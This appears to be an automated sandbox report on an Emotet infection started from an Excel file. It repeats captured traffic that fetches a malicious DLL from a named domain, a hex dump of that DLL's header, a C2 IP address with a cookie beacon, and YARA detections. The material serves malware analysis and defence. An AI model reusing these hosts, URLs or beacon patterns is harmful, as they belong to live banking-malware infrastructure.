00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/x-msdownloadExpires: Wed, 02 Mar 2022 15:18:34 GMTLast-Modified: Wed, 02 Mar 2022 15:18:34 GMTServer: Set-Cookie: 621f8aca6fba5=1646234314; expires=Wed, 02-Mar-2022 15:19:34 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="uVyr9TJj.dll"Content-Transfer-Encoding: binaryX-Powered-By-Plesk: PleskWinDate: Wed, 02 Mar 2022 15:18:33 GMTContent-Length: 1028096Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 be 93 00 15 fa f2 6e 46 fa f2 6e 46 fa f2 6e 46 39 fd 31 46 f0 f2 6e 46 39 fd 33 46 ed f2 6e 46 fa f2 6f 46 da f0 6e 46 dd 34 13 46 e5 f2 6e 46 dd 34 03 46 76 f2 6e 46 dd 34 00 46 5b f2 6e 46 dd 34 14 46 fb f2 6e 46 dd 34 12 46 fb f2 6e 46 fa f2 6e 46 fb f2 6e 46 dd 34 16 46 fb f2 6e 46 52 69 63 68 fa f2 6e 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c 7e 1e 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 09 00 00 80 06 00 00 00 00 00 27 8e 04 00 00 10 00 00 00 70 09 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7b 0b 00 ab 01 00 00 00 00 0c 00 f0 00 00 00 00 50 0c 00 c6 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0f 00 f4 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 0c 0c 00 f4 0b 00 00 00 40 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 50 09 00 00 10 00 00 00 60 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4b 0d 02 00 00 70 09 00 00 10 02 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 7f 00 00 00 80 0b 00 00 40 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b3 3f 00 00 00 00 0c 00 00 40 00 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 40 0c 00 00 10 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 fe 02 00 00 50 0c 00 00 00 03 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 05 9f 00 00 00 50 0f 00 00 a0 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/x-msdownloadExpires: Wed, 02 Mar 2022 15:18:34 GMTLast-Modified: Wed, 02 Mar 2022 15:18:34 GMTServer: Set-Cookie: 621f8aca6fba5=1646234314; expires=Wed, 02-Mar-2022 15:19:34 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="uVyr9TJj.dll"Content-Transfer-Encoding: binaryX-Powered-By-Plesk: PleskWinDate: Wed, 02 Mar 2022 15:18:33 GMTContent-Length: 1028096Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 be 93 00 15 fa f2 6e 46 fa f2 6e 46 fa f2 6e 46 39 fd 31 46 f0 f2 6e 46 39 fd 33 46 ed f2 6e 46 fa f2 6f 46 da f0 6e 46 dd 34 13 46 e5 f2 6e 46 dd 34 03 46 76 f2 6e 46 dd 34 00 46 5b f2 6e 46 dd 34 14 46 fb f2 6e 46 dd 34 12 46 fb f2 6e 46 fa f2 6e 46 fb f2 6e 46 dd 34 16 46 fb f2 6e 46 52 69 63 68 fa f2 6e 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c 7e 1e 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 09 00 00 80 06 00 00 00 00 00 27 8e 04 00 00 10 00 00 00 70 09 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7b 0b 00 ab 01 00 00 00 00 0c 00 f0 00 00 00 00 50 0c 00 c6 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0f 00 f4 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 0c 0c 00 f4 0b 00 00 00 40 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 50 09 00 00 10 00 00 00 60 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4b 0d 02 00 00 70 09 00 00 10 02 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 7f 00 00 00 80 0b 00 00 40 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b3 3f 00 00 00 00 0c 00 00 40 00 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 40 0c 00 00 10 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 fe 02 00 00 50 0c 00 00 00 03 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 05 9f 00 00 00 50 0f 00 00 a0 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/x-msdownloadExpires: Wed, 02 Mar 2022 15:18:34 GMTLast-Modified: Wed, 02 Mar 2022 15:18:34 GMTServer: Set-Cookie: 621f8aca6fba5=1646234314; expires=Wed, 02-Mar-2022 15:19:34 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="uVyr9TJj.dll"Content-Transfer-Encoding: binaryX-Powered-By-Plesk: PleskWinDate: Wed, 02 Mar 2022 15:18:33 GMTContent-Length: 1028096Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 be 93 00 15 fa f2 6e 46 fa f2 6e 46 fa f2 6e 46 39 fd 31 46 f0 f2 6e 46 39 fd 33 46 ed f2 6e 46 fa f2 6f 46 da f0 6e 46 dd 34 13 46 e5 f2 6e 46 dd 34 03 46 76 f2 6e 46 dd 34 00 46 5b f2 6e 46 dd 34 14 46 fb f2 6e 46 dd 34 12 46 fb f2 6e 46 fa f2 6e 46 fb f2 6e 46 dd 34 16 46 fb f2 6e 46 52 69 63 68 fa f2 6e 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c 7e 1e 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 09 00 00 80 06 00 00 00 00 00 27 8e 04 00 00 10 00 00 00 70 09 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7b 0b 00 ab 01 00 00 00 00 0c 00 f0 00 00 00 00 50 0c 00 c6 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0f 00 f4 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 0c 0c 00 f4 0b 00 00 00 40 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 50 09 00 00 10 00 00 00 60 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4b 0d 02 00 00 70 09 00 00 10 02 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 7f 00 00 00 80 0b 00 00 40 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b3 3f 00 00 00 00 0c 00 00 40 00 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 40 0c 00 00 10 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 fe 02 00 00 50 0c 00 00 00 03 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 05 9f 00 00 00 50 0f 00 00 a0 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/x-msdownloadExpires: Wed, 02 Mar 2022 15:18:34 GMTLast-Modified: Wed, 02 Mar 2022 15:18:34 GMTServer: Set-Cookie: 621f8aca6fba5=1646234314; expires=Wed, 02-Mar-2022 15:19:34 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="uVyr9TJj.dll"Content-Transfer-Encoding: binaryX-Powered-By-Plesk: PleskWinDate: Wed, 02 Mar 2022 15:18:33 GMTContent-Length: 1028096Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 be 93 00 15 fa f2 6e 46 fa f2 6e 46 fa f2 6e 46 39 fd 31 46 f0 f2 6e 46 39 fd 33 46 ed f2 6e 46 fa f2 6f 46 da f0 6e 46 dd 34 13 46 e5 f2 6e 46 dd 34 03 46 76 f2 6e 46 dd 34 00 46 5b f2 6e 46 dd 34 14 46 fb f2 6e 46 dd 34 12 46 fb f2 6e 46 fa f2 6e 46 fb f2 6e 46 dd 34 16 46 fb f2 6e 46 52 69 63 68 fa f2 6e 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c 7e 1e 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 09 00 00 80 06 00 00 00 00 00 27 8e 04 00 00 10 00 00 00 70 09 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7b 0b 00 ab 01 00 00 00 00 0c 00 f0 00 00 00 00 50 0c 00 c6 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0f 00 f4 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 0c 0c 00 f4 0b 00 00 00 40 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 50 09 00 00 10 00 00 00 60 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4b 0d 02 00 00 70 09 00 00 10 02 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 7f 00 00 00 80 0b 00 00 40 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b3 3f 00 00 00 00 0c 00 00 40 00 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 40 0c 00 00 10 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 fe 02 00 00 50 0c 00 00 00 03 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 05 9f 00 00 00 50 0f 00 00 a0 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive

Source: unknown

Network traffic detected: IP country count 16

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.39.118
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.39.118
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.39.118
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.39.118
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.39.118
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.39.118
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.39.118
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.39.118
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.39.118
Source: unknown	TCP traffic detected without corresponding DNS query: 168.119.39.118

Source: regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000011.00000002.982352309.000000000029A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.39.118/
Source: regsvr32.exe, 00000011.00000002.982352309.000000000029A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.39.118/VxWevwAgWLhgwlSMISwgQGXvCMJFvhJsKwmPLMgURWy
Source: regsvr32.exe, 00000011.00000002.982352309.000000000029A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.39.118/VxWevwAgWLhgwlSMISwgQGXvCMJFvhJsKwmPLMgURWy1BC35
Source: regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E829263A.png

Jump to behavior

Source: unknown

DNS traffic detected: queries for: gymsportive.com

Source: global traffic	HTTP traffic detected: GET /VxWevwAgWLhgwlSMISwgQGXvCMJFvhJsKwmPLMgURWy HTTP/1.1Cookie: lNoAlmMWNqxkzJO=AL4lu/QDFP/gSd6e2NBEVOKc1Goi3YlVwmueKcyR6a1HN/ziVgw+GTzP2pv++a7HcVDWG1mZHu2gisHDPZLfJxwA0O0esxmVS0e17XvSeonktSj+auGTYHLAeTw9LtYwhPCG5PNEJx0EKPU4Urz3acxICGBTVESIvLr+kijyToSmxbQLDvdd7AG/0V8ZLTdL2FO9bftPGowsaHOQ2HK3wTWVf9e0lABmsVp/z6caa5tFOieTPiaRnTourFS3vYbHKL1sCEPXx4m4dFGmHost: 168.119.39.118Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 168.119.39.118:443 -> 192.168.2.22:49169 version: TLS 1.2

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10043612 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,	4_2_10043612
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001A1A1 GetKeyState,GetKeyState,GetKeyState,GetKeyState,	4_2_1001A1A1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100422FA GetKeyState,GetKeyState,GetKeyState,	4_2_100422FA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100464D4 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,	4_2_100464D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100145C3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,	4_2_100145C3

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 15.2.regsvr32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.regsvr32.exe.c60000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.regsvr32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.regsvr32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.cc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.3d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.regsvr32.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.8d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.regsvr32.exe.200000.0.unpack, type: UNPACKEDPE
